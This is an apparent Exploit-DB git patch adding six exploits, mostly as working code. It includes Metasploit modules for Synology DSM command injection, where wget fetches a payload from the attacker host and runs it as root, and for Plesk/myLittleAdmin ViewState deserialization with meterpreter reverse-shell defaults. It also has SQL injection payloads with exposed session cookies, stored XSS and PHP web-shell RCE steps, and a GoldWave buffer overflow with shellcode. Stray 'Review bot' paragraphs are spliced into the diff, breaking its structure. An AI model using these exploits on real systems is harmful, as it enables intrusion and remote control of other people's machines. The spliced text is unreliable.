From 4fbd3630c8dbd4ddfec45d203f1eb41e26aee87c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 26 May 2020 05:01:56 +0000 Subject: [PATCH] DB: 2020-05-26 6 changes to exploits/shellcodes GoldWave - Buffer Overflow (SEH Unicode) Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit) Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit) Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated) Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting Online Discussion Forum Site 1.0 - Remote Code Execution --- exploits/hardware/remote/48514.rb | 209 ++++++++++++++++++++++++++++++ exploits/php/webapps/48509.txt | 56 ++++++++ exploits/php/webapps/48511.txt | 66 ++++++++++ exploits/php/webapps/48512.txt | 21 +++ exploits/windows/local/48510.py | 80 ++++++++++++ exploits/windows/remote/48513.rb | 209 ++++++++++++++++++++++++++++++ files_exploits.csv | 6 + 7 files changed, 647 insertions(+) create mode 100755 exploits/hardware/remote/48514.rb create mode 100644 exploits/php/webapps/48509.txt create mode 100644 exploits/php/webapps/48511.txt create mode 100644 exploits/php/webapps/48512.txt create mode 100755 exploits/windows/local/48510.py create mode 100755 exploits/windows/remote/48513.rb diff --git a/exploits/hardware/remote/48514.rb b/exploits/hardware/remote/48514.rb new file mode 100755 index 000000000..b10b45766 --- /dev/null +++ b/exploits/hardware/remote/48514.rb 
@@ -0,0 +1,209 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::HttpServer
+ include Msf::Exploit::FileDropper
+
+ DEVICE_INFO_PATTERN = /major=(?\d+)&minor=(?\d+)&build=(?\d+)
+ &junior=\d+&unique=synology_\w+_(?[^&]+)/x.freeze
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Synology DiskStation Manager smart.cgi Remote Command Execution',
+ 'Description' => %q{
+ This module exploits a vulnerability found in Synology DiskStation Manager (DSM)
+ versions < 5.2-5967-5, which allows the execution of arbitrary commands under root
+ privileges after website authentication.
+ The vulnerability is located in webman/modules/StorageManager/smart.cgi, which
+ allows appending of a command to the device to be scanned. However, the command
+ with drive is limited to 30 characters. A somewhat valid drive name is required,
+ thus /dev/sd is used, even though it doesn't exist. To circumvent the character
+ restriction, a wget input file is staged in /a, and executed to download our payload
+ to /b. From there the payload is executed. A wfsdelay is required to give time
+ for the payload to download, and the execution of it to run.
+ },
+ 'Author' =>
+ [
+ 'Nigusu Kassahun', # Discovery
+ 'h00die' # metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2017-15889' ],
+ [ 'EDB', '43190' ],
+ [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-synology-storagemanager-smart-cgi-remote-command-execution/' ],
+ [ 'URL', 'https://synology.com/en-global/security/advisory/Synology_SA_17_65_DSM' ]
+ ],
+ 'Privileged' => true,
+ 'Stance' => Msf::Exploit::Stance::Aggressive,
+ 'Platform' => ['python'],
+ 'Arch' => [ARCH_PYTHON],
+ 'Targets' =>
+ [
+ ['Automatic', {}]
+ ],
+ 'DefaultTarget' => 0,
+ 'DefaultOptions' => {
+ 'PrependMigrate' => true,
+ 'WfsDelay' => 10
+ },
+ 'License' => MSF_LICENSE,
+ 'DisclosureDate' => 'Nov 08 2017'
+ )
+ )
+
+ register_options(
+ [
+ Opt::RPORT(5000),
+ OptString.new('TARGETURI', [true, 'The URI of the Synology Website', '/']),
+ OptString.new('USERNAME', [true, 'The Username for Synology', 'admin']),
+ OptString.new('PASSWORD', [true, 'The Password for Synology', ''])
+ ]
+ )
+
+ register_advanced_options [
+ OptBool.new('ForceExploit', [false, 'Override check result', false])
+ ]
+ end
+
+ def check
+ vprint_status('Trying to detect installed version')
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'webman', 'info.cgi'),
+ 'vars_get' => { 'host' => '' }
+ })
+
+ if res && (res.code == 200) && res.body =~ DEVICE_INFO_PATTERN
+ version = "#{$LAST_MATCH_INFO[:major]}.#{$LAST_MATCH_INFO[:minor]}"
+ build = $LAST_MATCH_INFO[:build]
+ model = $LAST_MATCH_INFO[:model].sub(/^[a-z]+/) { |s| s[0].upcase }
+ model = "DS#{model}" unless model =~ /^[A-Z]/
+ else
+ vprint_error('Detection failed')
+ return CheckCode::Unknown
+ end
+
+ vprint_status("Model #{model} with version #{version}-#{build} detected")
+
+ case version
+ when '3.0', '4.0', '4.1', '4.2', '4.3', '5.0', '5.1'
+ return CheckCode::Appears
+ when '5.2'
+ return CheckCode::Appears if build < '5967-5'
+ end
+
+ CheckCode::Safe
+ end
+
+ def on_request_uri(cli, _request, cookie, token)
+ print_good('HTTP Server request received, sending payload')
+ send_response(cli, payload.encoded)
+ print_status('Executing payload')
+ inject_request(cookie, token, 'python b')
+ end
+
+ def inject_request(cookie, token, cmd = '')
+ send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'webman', 'modules', 'StorageManager', 'smart.cgi'),
+ 'cookie' => cookie,
+ 'headers' => {
+ 'X-SYNO-TOKEN' => token
+ },
+ 'vars_post' => {
+ 'action' => 'apply',
+ 'operation' => 'quick',
+ 'disk' => "/dev/sd`#{cmd}`"
+ }
+ })
+ end
+
+ def login
+ # If you try to debug login through the browser, you'll see that desktop.js calls
+ # ux-all.js to do an RSA encrypted login.
+ # Wowever in a stroke of luck Mrs. h00die caused
+ # a power sag while tracing/debugging the loging, causing the NAS to power off.
+ # when that happened, it failed to get the crypto vars, and defaulted to a
+ # non-encrypted login, which seems to work just fine. greetz Mrs. h00die!
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'webman', 'login.cgi'),
+ 'vars_get' => { 'enable_syno_token' => 'yes' },
+ 'vars_post' => {
+ 'username' => datastore['USERNAME'],
+ 'passwd' => datastore['PASSWORD'],
+ 'OTPcode' => '',
+ '__cIpHeRtExT' => '',
+ 'client_time' => Time.now.to_i,
+ 'isIframeLogin' => 'yes'
+ }
+ })
+ if res && %r{(?.*)}m =~ res.body
+ result = JSON.parse(json)
+
+ fail_with(Failure::BadConfig, 'Incorrect Username/Password') if result['result'] == 'error'
+ if result['result'] == 'success'
+ return res.get_cookies, result['SynoToken']
+ end
+
+ fail_with(Failure::Unknown, "Unknown response: #{result}")
+ end
+ end
+
+ def exploit
+ unless check == CheckCode::Appears
+ unless datastore['ForceExploit']
+ fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+ end
+ print_warning 'Target does not appear to be vulnerable'
+ end
+
+ if datastore['SRVHOST'] == '0.0.0.0'
+ fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful')
+ end
+
+ begin
+ print_status('Attempting Login')
+ cookie, token = login
+
+ start_service({ 'Uri' => {
+ 'Proc' => proc do |cli, req|
+ on_request_uri(cli, req, cookie, token)
+ end,
+ 'Path' => '/'
+ } })
+
+ print_status('Cleaning env')
+ inject_request(cookie, token, cmd = 'rm -rf /a')
+ inject_request(cookie, token, cmd = 'rm -rf b')
+ command = "#{datastore['SRVHOST']}:#{datastore['SRVPORT']}".split(//)
+ command_space = 22 - "echo -n ''>>/a".length
+ command_space -= 1
+ command.each_slice(command_space) do |a|
+ a = a.join('')
+ vprint_status("Staging wget with: echo -n '#{a}'>>/a")
+ inject_request(cookie, token, cmd = "echo -n '#{a}'>>/a")
+ end
+ print_status('Requesting payload pull')
+ register_file_for_cleanup('/usr/syno/synoman/webman/modules/StorageManager/b')
+ register_file_for_cleanup('/a')
+ inject_request(cookie, token, cmd = 'wget -i /a -O b')
+ # at this point we let the HTTP server call the last stage
+ # wfsdelay should be long enough to hold out for everything to download and run
+ rescue ::Rex::ConnectionError
+ fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+ end
+
+ end
+end
\ No newline at end of file
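Review bot: `login` returns nil when the response body does not match its `%r{…}m` regex, because the `if res && …` has no `else`; `cookie, token = login` in `exploit` then proceeds with two nils into `start_service` and the `inject_request` calls, so add `else fail_with(Failure::Unknown, 'Login response did not contain the expected JSON')` before that `end`. The four `inject_request(cookie, token, cmd = '…')` calls in `exploit` use assignment in argument position, which only creates an unused local named `cmd`; pass the string directly, `inject_request(cookie, token, 'rm -rf /a')`. In `check`, `build < '5967-5'` is a String comparison on a digits-only capture, so the branch follows lexical rather than numeric order; a comment stating that, or a numeric parse, would make the intent explicit. The named captures read via `$LAST_MATCH_INFO[:major]` and the `json` local do not appear in `DEVICE_INFO_PATTERN` or the login regex as rendered here (`(?\d+)`, `(?.*)`), which looks like an extraction artifact rather than part of the commit. The comment block in `login` has typos (`Wowever`, `loging`).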
diff --git a/exploits/php/webapps/48509.txt b/exploits/php/webapps/48509.txt
new file mode 100644
index 000000000..1db9ad318
--- /dev/null
+++ b/exploits/php/webapps/48509.txt
@@ -0,0 +1,56 @@
+# Exploit Title: Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)
+# Exploit Author: SunCSR (Sun* Cyber Security Research)
+# Date: 2020 - 5 - 22
+# Vender Homepage: https://help.10web.io/
+# Version: <= 5.4.1
+# Tested on: Ubuntu 18.04
+
+Description:
+SQL injection in the Form Maker by 10Web WordPress Plugin before 5.4.1
+exists via the /wordpress/wp-admin/admin.php?page=blocked_ips_fm&s=1" s
+parameter.
+
+Poc:
+GET /wordpress/wp-admin/admin.php?page=blocked_ips_fm&s=1" HTTP/1.1
+Host: test-wp.com
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101
+Firefox/76.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie:
+wordpress_a1c6f59e10f34b6016913b2f9ff0346f=admin%7C1590313373%7CtioKZPEQ9lGWkoMcKGK2qjTp8kepuU9cqticECRXZ79%7C96d43f4ee5cf009365c9722f461d538f96a62637094759cb6fb7a9f54edac171;
+wordpress_test_cookie=WP+Cookie+check;
+wordpress_logged_in_a1c6f59e10f34b6016913b2f9ff0346f=admin%7C1590313373%7CtioKZPEQ9lGWkoMcKGK2qjTp8kepuU9cqticECRXZ79%7C9a63283d84855ed6eeae8e4b5f3a405fba003ddd15748bf5cdca5caaca228a19;
+wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1590140574;
+PHPSESSID=5bpdr8tbj5furvccoadjjj2sgb
+Upgrade-Insecure-Requests: 1
+
+SQLMap using:
+sqlmap -u '
+http://test-wp.com:80/wordpress/wp-admin/admin.php?page=blocked_ips_fm&s=123'
+--cookie='wordpress_a1c6f59e10f34b6016913b2f9ff0346f=admin%7C1590313373%7CtioKZPEQ9lGWkoMcKGK2qjTp8kepuU9cqticECRXZ79%7C96d43f4ee5cf009365c9722f461d538f96a62637094759cb6fb7a9f54edac171;wordpress_test_cookie=WP+Cookie+check;wordpress_logged_in_a1c6f59e10f34b6016913b2f9ff0346f=admin%7C1590313373%7CtioKZPEQ9lGWkoMcKGK2qjTp8kepuU9cqticECRXZ79%7C9a63283d84855ed6eeae8e4b5f3a405fba003ddd15748bf5cdca5caaca228a19;wp-settings-1=libraryContent%3Dbrowse;wp-settings-time-1=1590140574;PHPSESSID=5bpdr8tbj5furvccoadjjj2sgb'
+
+Parameter: s (GET)
+ Type: boolean-based blind
+ Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+ Payload: page=blocked_ips_fm&s=-1027" OR 8913=8913#
+
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (FLOOR)
+ Payload: page=blocked_ips_fm&s=123" AND (SELECT 2867 FROM(SELECT
+COUNT(*),CONCAT(0x717a707871,(SELECT
+(ELT(2867=2867,1))),0x71787a7671,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- TxQH
+
+ Type: AND/OR time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind
+ Payload: page=blocked_ips_fm&s=123" AND SLEEP(5)-- oPEC
+---
+[17:20:17] [INFO] the back-end DBMS is MySQL
+web server operating system: Linux Ubuntu
+web application technology: Apache 2.4.29
+back-end DBMS: MySQL >= 5.0
\ No newline at end of file
diff --git a/exploits/php/webapps/48511.txt b/exploits/php/webapps/48511.txt
new file mode 100644
index 000000000..8422cf94a
--- /dev/null
+++ b/exploits/php/webapps/48511.txt
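Review bot: The version wording in the 48509.txt hunk is inconsistent: the title says `Form Maker 5.4.1`, the `# Version:` header says `<= 5.4.1`, and the description says `before 5.4.1`, so a reader cannot tell whether 5.4.1 itself is affected; settle on one statement and use it in all three places. The PoC request and the sqlmap command both reproduce full `wordpress_*` session cookies and a `PHPSESSID` for the test instance; an advisory should replace such values with placeholders like `<session-cookie>` rather than publish working credentials. `# Vender Homepage` is a typo for `Vendor Homepage`, and `# Date: 2020 - 5 - 22` does not follow the `YYYY-MM-DD` form the other entries in this commit use.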
@@ -0,0 +1,66 @@
+# Exploit Title: Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting
+# Google Dork: N/A
+# Date: 2020-05-23
+# Exploit Author: Nitya Nand
+# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
+# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
+# Version: 1.0
+# Tested on: Linux
+# CVE : N/A
+
+
+Description: The POST parameter 'user_name', 'user_firstname', 'user_lastname' is vulnerable to persistent cross site scripting Payload:
+POST /phpmaster/admin/users.php?source=add_user HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/phpmaster/admin/users.php?source=add_user
+Content-Type: multipart/form-data; boundary=---------------------------515906178311115682892435428
+Content-Length: 417375
+Connection: close
+Cookie: PHPSESSID=8810e038f92cd7c711ee8b95db1dcacb
+Upgrade-Insecure-Requests: 1
+
+-----------------------------515906178311115682892435428
+
+Content-Disposition: form-data; name="user_name"
+">
+
+-----------------------------515906178311115682892435428
+
+Content-Disposition: form-data; name="user_firstname"
+">
+
+-----------------------------515906178311115682892435428
+
+Content-Disposition: form-data; name="user_lastname"
+">
+
+-----------------------------515906178311115682892435428
+
+Content-Disposition: form-data; name="user_image"; filename="9400.jpg"
+Content-Type: image/jpeg
+
+-----------------------------515906178311115682892435428
+
+Content-Disposition: form-data; name="user_role"
+User
+
+-----------------------------515906178311115682892435428
+
+Content-Disposition: form-data; name="user_email"
+abc@gmail.com
+
+-----------------------------515906178311115682892435428
+
+Content-Disposition: form-data; name="user_password"
+1234
+
+-----------------------------515906178311115682892435428
+
+Content-Disposition: form-data; name="create_user"
+
+Add User
+-----------------------------515906178311115682892435428--
\ No newline at end of file
diff --git a/exploits/php/webapps/48512.txt b/exploits/php/webapps/48512.txt
new file mode 100644
index 000000000..4391c1c67
--- /dev/null
+++ b/exploits/php/webapps/48512.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Online Discussion Forum Site 1.0 - Remote Code Execution
+# Google Dork: N/A
+# Date: 2020-05-24
+# Exploit Author: Selim Enes 'Enesdex' Karaduman
+# Vendor Homepage: https://www.sourcecodester.com/php/14233/online-discussion-forum-site.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14233&title=Online+Discussion+Forum+Site
+# Version: 1.0 (REQUIRED)
+# Tested on: Windows 10 / Wamp Server
+# CVE : N/A
+Go to http://localhost/Online%20Discussion%20Forum%20Site/register.php register page to sign up
+Then fill other fields and upload the shell.php with following PHP-shell-code
+
+
+
+After the registration process is completed go to the following page and execute the os command via uploaded shell
+http://localhost/Online%20Discussion%20Forum%20Site/ups/shell.php?cmd=$THECODE-YOU-WANT-TO-EXECUTE
+
+Any unauthenticated attacker is able to execute arbitrary os command
\ No newline at end of file
diff --git a/exploits/windows/local/48510.py b/exploits/windows/local/48510.py
new file mode 100755
index 000000000..6b79fff26
--- /dev/null
+++ b/exploits/windows/local/48510.py
@@ -0,0 +1,80 @@
+# Exploit Title: GoldWave 5.70 – Buffer Overflow (SEH Unicode)
+# Date: 2020-05-14
+# Exploit Author: Andy Bowden
+# Vendor Homepage: https://www.goldwave.com/
+# Version: 5.70
+# Download Link: http://goldwave.com//downloads/gwave570.exe
+# Tested on: Windows 10 x86
+
+# PoC
+# 1. generate crash.txt, copy contents to clipboard
+# 2. open gold wave app
+# 3. select File, Open URL...
+# 4. paste contents from clipboard after 'http://'
+# 5. select OK
+
+f = open("crash.txt", "wb")
+
+buf = b""
+buf += b"\x41" * 1019
+buf += b"\x71\x71" # Unicode NOP
+buf += b"\xB3\x48" # 0x004800b3 | pop ecx, pop ebp, ret
+
+#realigning stack
+buf += b"\x75" # Unicode NOP
+buf += b"\x54" # Push ESP
+buf += b"\x75" # Unicode NOP
+buf += b"\x58" # POP EAX
+buf += b"\x75" # Unicode NOP
+buf += b"\x05\xFF\x10" # ADD EAX,
+buf += b"\x75" # Unicode NOP
+buf += b"\x2d\xEA\x10" # SUB EAX,
+buf += b"\x75"
+buf += b"\x71" * 595
+
+#msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper
+BufferRegister=EAX -f python
+buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51"
+buf += b"\x41\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44"
+buf += b"\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41"
+buf += b"\x51\x41\x49\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50"
+buf += b"\x41\x5a\x31\x41\x49\x31\x41\x49\x41\x49\x41\x4a\x31"
+buf += b"\x31\x41\x49\x41\x49\x41\x58\x41\x35\x38\x41\x41\x50"
+buf += b"\x41\x5a\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49"
+buf += b"\x41\x49\x51\x49\x31\x31\x31\x31\x41\x49\x41\x4a\x51"
+buf += b"\x49\x31\x41\x59\x41\x5a\x42\x41\x42\x41\x42\x41\x42"
+buf += b"\x41\x42\x33\x30\x41\x50\x42\x39\x34\x34\x4a\x42\x4b"
+buf += b"\x4c\x59\x58\x35\x32\x4b\x50\x4b\x50\x4d\x30\x31\x50"
+buf += b"\x43\x59\x4b\x35\x50\x31\x39\x30\x42\x44\x54\x4b\x50"
+buf += b"\x50\x30\x30\x54\x4b\x42\x32\x4c\x4c\x54\x4b\x31\x42"
+buf += b"\x4c\x54\x54\x4b\x34\x32\x4f\x38\x4c\x4f\x48\x37\x50"
+buf += b"\x4a\x4f\x36\x50\x31\x4b\x4f\x36\x4c\x4f\x4c\x31\x51"
+buf += b"\x43\x4c\x4c\x42\x4e\x4c\x4f\x30\x39\x31\x38\x4f\x4c"
+buf += b"\x4d\x4d\x31\x59\x37\x4a\x42\x4a\x52\x42\x32\x51\x47"
+buf += b"\x34\x4b\x50\x52\x4c\x50\x34\x4b\x30\x4a\x4f\x4c\x54"
+buf += b"\x4b\x30\x4c\x4e\x31\x34\x38\x4b\x33\x30\x48\x4b\x51"
+buf += b"\x4a\x31\x30\x51\x54\x4b\x50\x59\x4d\x50\x4d\x31\x5a"
+buf += b"\x33\x44\x4b\x31\x39\x4c\x58\x39\x53\x4e\x5a\x30\x49"
+buf += b"\x44\x4b\x4e\x54\x34\x4b\x4d\x31\x4a\x36\x4e\x51\x4b"
+buf += b"\x4f\x36\x4c\x59\x31\x38\x4f\x4c\x4d\x4b\x51\x49\x37"
+buf += b"\x4e\x58\x4b\x30\x52\x55\x4b\x46\x4c\x43\x43\x4d\x4c"
+buf += b"\x38\x4f\x4b\x43\x4d\x4e\x44\x42\x55\x5a\x44\x30\x58"
+buf += b"\x54\x4b\x52\x38\x4e\x44\x4b\x51\x59\x43\x31\x56\x34"
+buf += b"\x4b\x4c\x4c\x50\x4b\x34\x4b\x50\x58\x4d\x4c\x4b\x51"
+buf += b"\x39\x43\x44\x4b\x4d\x34\x44\x4b\x4b\x51\x4a\x30\x35"
+buf += b"\x39\x30\x44\x4d\x54\x4d\x54\x31\x4b\x51\x4b\x53\x31"
+buf += b"\x50\x59\x50\x5a\x32\x31\x4b\x4f\x49\x50\x31\x4f\x31"
+buf += b"\x4f\x31\x4a\x34\x4b\x4e\x32\x4a\x4b\x54\x4d\x51\x4d"
+buf += b"\x51\x5a\x4b\x51\x54\x4d\x54\x45\x46\x52\x4b\x50\x4d"
+buf += b"\x30\x4b\x50\x32\x30\x33\x38\x4e\x51\x34\x4b\x42\x4f"
+buf += b"\x34\x47\x4b\x4f\x49\x45\x57\x4b\x5a\x50\x38\x35\x45"
+buf += b"\x52\x52\x36\x42\x48\x37\x36\x34\x55\x47\x4d\x55\x4d"
+buf += b"\x4b\x4f\x4a\x35\x4f\x4c\x4c\x46\x33\x4c\x4c\x4a\x43"
+buf += b"\x50\x4b\x4b\x39\x50\x33\x45\x4d\x35\x47\x4b\x50\x47"
+buf += b"\x4e\x33\x42\x52\x42\x4f\x31\x5a\x4b\x50\x50\x53\x4b"
+buf += b"\x4f\x49\x45\x52\x43\x53\x31\x42\x4c\x53\x33\x4e\x4e"
+buf += b"\x32\x45\x34\x38\x53\x35\x4b\x50\x41\x41"
+buf += b"\x44" * (5000 - len(buf))
+
+f.write(buf)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/remote/48513.rb b/exploits/windows/remote/48513.rb
new file mode 100755
index 000000000..fb4160ef2
--- /dev/null
+++ b/exploits/windows/remote/48513.rb
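Review bot: The wrapped second half of the msfvenom comment, `BufferRegister=EAX -f python`, has no leading `#`, so as committed the interpreter stops with a SyntaxError at that line before `crash.txt` is ever written; it should read `#BufferRegister=EAX -f python` or be folded back into the comment line above it. The file handle is opened at the top of the script and closed by hand at the bottom; wrapping the write in `with open("crash.txt", "wb") as f:` closes it on any exception as well. The comments `# ADD EAX,` and `# SUB EAX,` on the two stack-realignment lines stop mid-phrase and should either name the operand they describe or be completed.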
@@ -0,0 +1,209 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+ Rank = ExcellentRanking
+
+ #
+ VIEWSTATE_GENERATOR = 'CA0B0334'.freeze
+
+ #
+ VIEWSTATE_VALIDATION_KEY =
+ "\x5c\x7e\xef\x66\x50\x63\x9d\x2c\xb8\xfa\xa0\xda\x36\xaf\x24\x45\x2d\xcf" \
+ "\x69\x06\x5f\x2e\xdc\x2c\x8f\x2f\x44\xc0\x22\x0b\xe2\xe5\x88\x9c\xa0\x1a" \
+ "\x20\x7f\xc5\xfc\xe6\x2d\x1a\x5a\x4f\x6d\x24\x10\x72\x22\x61\xe6\xa3\x3e" \
+ "\x77\xe0\x62\x8b\x17\xaa\x92\x80\x39\xbf".freeze
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::AutoCheck
+ include Msf::Exploit::ViewState
+ include Msf::Exploit::CmdStager
+ include Msf::Exploit::Powershell
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Plesk/myLittleAdmin ViewState .NET Deserialization',
+ 'Description' => %q{
+ This module exploits a ViewState .NET deserialization vulnerability in
+ web-based MS SQL Server management tool myLittleAdmin, for version 3.8
+ and likely older versions, due to hardcoded parameters in
+ the web.config file for ASP.NET.
+
+ Popular web hosting control panel Plesk offers myLittleAdmin as an
+ optional component that is selected automatically during "full"
+ installation. This exploit caters to the Plesk target, though it
+ should work fine against a standalone myLittleAdmin setup.
+
+ Successful exploitation results in code execution as the user running
+ myLittleAdmin, which is IUSRPLESK_sqladmin for Plesk and described as
+ the "SQL Admin MSSQL anonymous account."
+
+ Tested on the latest Plesk Obsidian with optional myLittleAdmin 3.8.
+ },
+ 'Author' => [
+ # Reported to SSD (SecuriTeam) by an anonymous researcher
+ # Publicly disclosed by Noam Rathaus of SSD (SecuriTeam)
+ 'Spencer McIntyre', # Inspiration
+ 'wvu' # Module
+ ],
+ 'References' => [
+ ['CVE', '2020-13166'],
+ ['URL', 'https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/'],
+ ['URL', 'https://portswigger.net/daily-swig/mylittleadmin-has-a-big-unpatched-security-flaw']
+ ],
+ 'DisclosureDate' => '2020-05-15', # SSD (SecuriTeam) advisory
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'win',
+ 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+ 'Privileged' => false,
+ 'Targets' => [
+ [
+ 'Windows Command',
+ 'Arch' => ARCH_CMD,
+ 'Type' => :win_cmd,
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
+ }
+ ],
+ [
+ 'Windows Dropper',
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Type' => :win_dropper,
+ 'CmdStagerFlavor' => %i[psh_invokewebrequest certutil vbs],
+ 'DefaultOptions' => {
+ 'CMDSTAGER::FLAVOR' => :psh_invokewebrequest,
+ 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+ }
+ ],
+ [
+ 'PowerShell Stager',
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Type' => :psh_stager,
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+ }
+ ]
+ ],
+ 'DefaultTarget' => 2,
+ 'DefaultOptions' => {
+ 'SSL' => true,
+ 'WfsDelay' => 10 # First exploit attempt may be a little slow
+ },
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'Reliability' => [REPEATABLE_SESSION],
+ 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+ }
+ )
+ )
+
+ register_options([
+ Opt::RPORT(8401, true, 'The myLittleAdmin port (default for Plesk!)'),
+ OptString.new('TARGETURI', [true, 'Base path', '/'])
+ ])
+
+ # XXX: https://github.com/rapid7/metasploit-framework/issues/12963
+ import_target_defaults
+ end
+
+ def check
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path)
+ )
+
+ unless res
+ return CheckCode::Unknown('Target did not respond to check request.')
+ end
+
+ unless res.code == 200 && res.body.include?('myLittleAdmin for SQL Server')
+ return CheckCode::Unknown('Target is not running myLittleAdmin.')
+ end
+
+ vprint_good("myLittleAdmin is running at #{full_uri}")
+ check_viewstate(res.get_html_document)
+ end
+
+ def check_viewstate(html)
+ viewstate = html.at('//input[@id = "__VIEWSTATE"]/@value')&.text
+
+ unless viewstate
+ return CheckCode::Detected("__VIEWSTATE not found, can't complete check.")
+ end
+
+ @viewstate_generator =
+ html.at('//input[@id = "__VIEWSTATEGENERATOR"]/@value')&.text
+
+ unless @viewstate_generator
+ print_warning('__VIEWSTATEGENERATOR not found, using known default value')
+ @viewstate_generator = VIEWSTATE_GENERATOR
+ end
+
+ # ViewState generator needs to be a packed integer now
+ @viewstate_generator = [@viewstate_generator.to_i(16)].pack('V')
+
+ we_can_sign_viewstate = can_sign_viewstate?(
+ viewstate,
+ extra: @viewstate_generator,
+ key: VIEWSTATE_VALIDATION_KEY
+ )
+
+ if we_can_sign_viewstate
+ return CheckCode::Vulnerable('We can sign our own ViewState.')
+ end
+
+ CheckCode::Safe("We can't sign our own ViewState.")
+ end
+
+ def exploit
+ # NOTE: Automatic check is implemented by the AutoCheck mixin
+ super
+
+ print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+ case target['Type']
+ when :win_cmd
+ execute_command(payload.encoded)
+ when :win_dropper
+ execute_cmdstager
+ when :psh_stager
+ execute_command(cmd_psh_payload(
+ payload.encoded,
+ payload.arch.first,
+ remove_comspec: true
+ ))
+ end
+ end
+
+ def execute_command(cmd, _opts = {})
+ vprint_status("Serializing command: #{cmd}")
+
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path),
+ 'vars_post' => {
+ # This is the only parameter we need for successful exploitation!
+ '__VIEWSTATE' => generate_viewstate_payload(
+ cmd,
+ extra: @viewstate_generator,
+ key: VIEWSTATE_VALIDATION_KEY
+ )
+ }
+ )
+
+ unless res && res.code == 302 && res.redirection.path == '/error/index.html'
+ fail_with(Failure::PayloadFailed, "Could not execute command: #{cmd}")
+ end
+
+ print_good("Successfully executed command: #{cmd}")
+ end
+
+end
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index c1debb4c8..8d75cda34 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11081,6 +11081,7 @@ id,file,description,date,author,type,platform,port
 48499,exploits/windows/local/48499.txt,"CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)",2020-05-21,"Xenofon Vassilakopoulos",local,windows,
 48505,exploits/windows/local/48505.txt,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation",2020-05-22,"Matteo Malvica",local,windows,
 48507,exploits/windows/local/48507.py,"VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)",2020-05-22,Gobinathan,local,windows,
+48510,exploits/windows/local/48510.py,"GoldWave - Buffer Overflow (SEH Unicode)",2020-05-25,"Andy Bowden",local,windows,
